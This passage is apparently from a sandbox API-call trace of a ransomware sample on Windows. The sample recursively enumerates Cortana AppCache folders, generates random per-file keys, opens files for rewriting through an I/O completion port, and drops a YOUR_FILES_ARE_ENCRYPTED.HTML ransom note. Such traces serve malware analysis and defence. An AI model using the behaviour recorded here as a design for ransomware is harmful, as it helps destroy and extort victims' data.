nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="AppCache", cAlternateFileName="")) returned 1 [0118.901] StrStrIW (lpFirst="AppCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.901] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache") returned 100 [0118.901] GetProcessHeap () returned 0x600000 [0118.901] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0118.902] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache" [0118.902] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\*" [0118.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e10e7a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.902] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e10e7a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0118.902] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xb4ccdcc, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0xb4ccdcc, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="C1J92J4X", cAlternateFileName="")) returned 1 [0118.902] StrStrIW (lpFirst="C1J92J4X", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.902] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X") returned 109 [0118.902] GetProcessHeap () returned 0x600000 [0118.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3104fd0 [0118.903] lstrcpyW (in: lpString1=0x3104fd0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X" [0118.903] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\*" [0118.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xb4ccdcc, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0xb4ccdcc, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0118.903] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xb4ccdcc, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0xb4ccdcc, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.903] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6e180f7d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x989e4279, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x989e4279, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="1", cAlternateFileName="")) returned 1 [0118.903] StrStrIW (lpFirst="1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.904] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1") returned 111 [0118.904] GetProcessHeap () returned 0x600000 [0118.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.905] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1" [0118.905] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\*" [0118.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6e180f7d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x989e4279, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x989e4279, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.906] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6e180f7d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x989e4279, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x989e4279, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.906] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e180f7d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e180f7d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x59ebb0a5, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x42840, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", cAlternateFileName="C__WIN~1.TXT")) returned 1 [0118.906] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.906] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned 196 [0118.907] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned=".txt" [0118.907] lstrlenW (lpString=".txt") returned 4 [0118.907] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned=".txt" [0118.907] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\1\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.907] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=272448) returned 1 [0118.907] GetProcessHeap () returned 0x600000 [0118.907] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0118.909] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="01") returned 2 [0118.909] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="01") returned 2 [0118.909] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="5E") returned 2 [0118.909] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="D9") returned 2 [0118.909] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="6A") returned 2 [0118.909] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="EA") returned 2 [0118.909] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="31") returned 2 [0118.909] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="E3") returned 2 [0118.909] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="54") returned 2 [0118.909] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="92") returned 2 [0118.909] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="5B") returned 2 [0118.909] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="79") returned 2 [0118.909] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="26") returned 2 [0118.909] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="00") returned 2 [0118.909] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="A5") returned 2 [0118.909] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="40") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="97") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="86") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="D8") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="3F") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="75") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="9D") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="1F") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="4C") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="87") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="D5") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="A6") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="5D") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="94") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="68") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="6D") returned 2 [0118.910] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="05") returned 2 [0118.910] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" [0118.910] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.911] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0118.911] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e180f7d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e180f7d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x59ebb0a5, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x42840, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", cAlternateFileName="C__WIN~1.TXT")) returned 0 [0118.911] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.911] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.911] GetProcessHeap () returned 0x600000 [0118.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.912] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.913] CloseHandle (hObject=0x32c) returned 1 [0118.913] GetProcessHeap () returned 0x600000 [0118.913] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.913] GetProcessHeap () returned 0x600000 [0118.913] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.913] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e2b228d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e2b228d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="2", cAlternateFileName="")) returned 1 [0118.913] StrStrIW (lpFirst="2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.913] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2") returned 111 [0118.913] GetProcessHeap () returned 0x600000 [0118.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.913] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2" [0118.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\*" [0118.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e2b228d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e2b228d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.914] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e2b228d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e2b228d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.914] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e28c015, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e28c015, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="appcache[1].man", cAlternateFileName="APPCAC~1.MAN")) returned 1 [0118.914] StrStrIW (lpFirst="appcache[1].man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.914] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\appcache[1].man") returned 127 [0118.914] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0118.914] lstrlenW (lpString=".man") returned 4 [0118.915] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0118.915] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e28c015, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e28c015, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0118.915] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.915] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\container.dat") returned 125 [0118.915] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.915] lstrlenW (lpString=".dat") returned 4 [0118.915] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.915] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\2\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0118.915] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.915] CloseHandle (hObject=0x318) returned 1 [0118.915] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e28c015, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e28c015, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x64ab274a, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x4760, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", cAlternateFileName="C__WIN~1.HTM")) returned 1 [0118.915] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.916] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: 